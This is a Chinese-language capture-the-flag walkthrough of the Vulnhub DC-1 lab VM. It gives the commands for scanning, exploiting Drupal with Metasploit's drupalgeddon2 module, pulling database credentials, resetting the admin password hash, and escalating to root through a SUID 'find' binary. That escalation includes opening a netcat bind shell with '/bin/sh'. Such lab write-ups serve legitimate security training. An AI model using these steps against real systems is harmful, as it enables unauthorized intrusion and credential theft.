Vulnhub靶机DC系列-DC1
2021-01-08 11:59:24 Author: www.freebuf.com(查看原文) 阅读量:309 收藏

0x0:靶场介绍

靶场名称:DC:1

靶场发布时间:2019-2-28

靶场地址:https://www.vulnhub.com/entry/dc-1,292/

靶场描述:

DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.

To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.

There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.

There are five flags in total, but the ultimate goal is to find and read the flag in root's home directory. You don't even need to be root to do this, however, you will require root privileges.

Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.

Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.

1x0:靶场环境搭建

作者提示使用VirtualBox VM,使用vmware也是一样(我是基于vmware)

在做靶机之前,最好对靶机进行快照防止一些操作造成靶机无法挽回的情况(欲哭无泪)

把靶机和攻击机设置在同一个网段(NAT)

攻击机:

1610069785_5ff7b7199319395146eaa.png!small?1610069785118

靶机IP:192.168.37.187

2x0:靶机渗透

获取靶机的IP

nmap -sn 192.168.37.0/24

1610069873_5ff7b771234d89cddd8e1.png!small?1610069872600

在网段环境中机器 比较多的情况,通多比对MAC地址来判断那个是靶机

1610069951_5ff7b7bf9132103723f8d.png!small?1610069951074

获取靶机的基本信息(系统版本端口开放情况等等):

1610070264_5ff7b8f8781d9df9ec057.png!small?1610070264012

通过访问页面可以得知是Drupal的CMS

1610070150_5ff7b88697556ac20e5d2.png!small?1610070150099

http://192.168.37.187/robots.txt 存在(robots.txt的文件)

1610070454_5ff7b9b67ef5d09d57876.png!small?1610070453984

结合一些页面的访问,大致的可以判断是drupal 7的版本

扫描目录也没有发现有价值的目录或文件(dirb http://192.168.37.187)

1610071135_5ff7bc5f7f848c76bdbb3.png!small?1610071135231

使用msfconsole 搜索一下关于drupal的模块,去对应的尝试一下

1610070879_5ff7bb5fe1536c362fde0.png!small?1610070879751

在尝试使用第四个exploit/unix/webapp/drupal_drupalgeddon2  (利用成功)

对模块进行配置

1610071185_5ff7bc918951f9c53b1a0.png!small?1610071185845

set RHOSTS 192.168.37.187 设置目标IP

exploit(成功反弹回来shell)

1610071259_5ff7bcdb9613f5d61a0c7.png!small?1610071259112

查看权限(www-data)

1610071286_5ff7bcf6cc25ec23ce405.png!small?1610071286325

2x1:flag1

查看当前目录

1610071355_5ff7bd3b91482b83453a3.png!small?1610071356029

提示去查看配置文件

1610071440_5ff7bd90ac7c46ae3363a.png!small?1610071440226

2x2:flag2

在/var/www/sites/default/settings.php drupal的配置文件中获取到 flag2

提示:不用暴力破解获取凭证(我自己的理解)

1610071816_5ff7bf08639990b21fca9.png!small?1610071815919

获取到mysql数据的账号密码,但是mysql数据没对外开放

1610072005_5ff7bfc5afeb57bc4a904.png!small?1610072005218

shell是哑的使用python

python -c "import pty;pty.spawn('/bin/bash')"

连接数据库

1610072159_5ff7c05f89e6eeb6ce5af.png!small?1610072159166

获取到drupal的账号和密码

1610072242_5ff7c0b235447bfb3118b.png!small?1610072241691

drupal密码的加密是破解不出来,需要重置管理的密码(加密脚本位置在网站根目录下的scripts/password-hash.sh)

php scripts/password-hash.sh admin  (admin是你要设置的新密码)

获取到admin的加密后的样子

1610072538_5ff7c1da17dfb9e7a7202.png!small?1610072537634

通过数据对admin账号的密码进行重置

1610072728_5ff7c29814e0c225235a8.png!small?1610072727655

然后登录admin账号即可

1610072816_5ff7c2f05e824b4d4da69.png!small?1610072815834

2x3:flag3

1610072933_5ff7c365ded7abf0d4e79.png!small?1610072933349

提示可以使用存在root权限的命令来进行提权

find / -user root -perm -4000 -print 2>/dev/null

1610073023_5ff7c3bfec25811f6c5e1.png!small?1610073023534

可以利用find来进行提取

先建立一个文件touch pentestlab

find pentestlab -exec whoami \;

1610073244_5ff7c49c302718709c959.png!small?1610073243604

使用root权限去执行命令 有root直接去查看root目录下的文件

发现thefinalflag.txt(等下..flag4???,怎么直接到最后一个flag了)

1610073290_5ff7c4ca616f01b41c15a.png!small?1610073289961

2x4 flag5(flag4在下面)

find pentestlab -exec cat /root/thefinalflag.txt \;

1610073412_5ff7c544981550a48caf2.png!small?1610073412113

2x5:flag4

继续寻找flag4

在home的目录下找到了flag4

1610073506_5ff7c5a292fc439c92771.png!small

cat flag4.txt

1610073642_5ff7c62ab1bb9c6ebefc2.png!small?1610073642322

靶机flag结束

3x1:root提权

获取到全部的flag后,对靶机进行提权

靶机执行

find pentestlab -exec nc -lvp 5551 -e /bin/sh \;

1610074108_5ff7c7fc08aec995eb3bb.png!small?1610074107577

在攻击机上去连接靶机的端口

1610074142_5ff7c81e40b3556f6c299.png!small?1610074141773

成功提权

小插曲:

暴力破解最后我也尝试了,对靶机的root和flag4都进行了破解,flag4的破解出来(root没跑完)

4x1:总结

1.suid提权的了解

2.对于drupal的文件目录及配置文件的了解

3.暴力破解是真的很长时间


文章来源: https://www.freebuf.com/articles/web/260236.html
如有侵权请联系:admin#unsafe.sh